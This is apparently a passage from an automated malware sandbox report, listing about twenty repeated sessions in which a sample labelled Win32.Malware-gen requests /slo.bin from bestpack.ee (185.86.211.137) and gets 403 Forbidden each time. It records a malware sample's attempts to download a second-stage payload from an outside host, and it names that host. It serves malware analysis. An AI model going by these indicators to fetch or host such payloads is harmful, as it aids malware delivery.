                                                                                                                      2024-09-27 17:00:08 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.11.2049777185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:00:19 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:00:19 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:00:19 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:00:19 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      9192.168.11.2049779185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:00:30 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:00:31 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:00:31 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:00:31 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      10192.168.11.2049781185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:00:42 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:00:42 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:00:42 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:00:42 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      11192.168.11.2049783185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:00:53 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:00:54 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:00:53 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:00:54 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      12192.168.11.2049785185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:01:04 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:01:05 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:01:05 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:01:05 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      13192.168.11.2049787185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:01:16 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:01:16 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:01:16 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:01:16 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      14192.168.11.2049789185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:01:27 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:01:28 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:01:28 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:01:28 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      15192.168.11.2049791185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:01:39 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:01:39 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:01:39 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:01:39 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      16192.168.11.2049793185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:01:50 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:01:51 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:01:50 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:01:51 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      17192.168.11.2049795185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:02:01 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:02:02 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:02:02 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:02:02 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      18192.168.11.2049797185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:02:13 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:02:13 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:02:13 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:02:13 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      19192.168.11.2049799185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:02:24 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:02:25 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:02:24 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:02:25 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      20192.168.11.2049801185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:02:35 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:02:36 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:02:36 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:02:36 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      21192.168.11.2049803185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:02:47 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:02:47 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:02:47 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:02:47 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      22192.168.11.2049805185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:02:58 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:02:59 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:02:58 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:02:59 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      23192.168.11.2049807185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:03:10 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:03:10 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:03:10 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:03:10 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      24192.168.11.2049809185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:03:21 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:03:21 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:03:21 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:03:21 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      25192.168.11.2049811185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:03:32 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:03:33 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:03:33 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:03:33 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      26192.168.11.2049813185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:03:44 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:03:44 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:03:44 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:03:44 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      27192.168.11.2049815185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:03:55 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:03:56 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:03:55 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:03:56 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
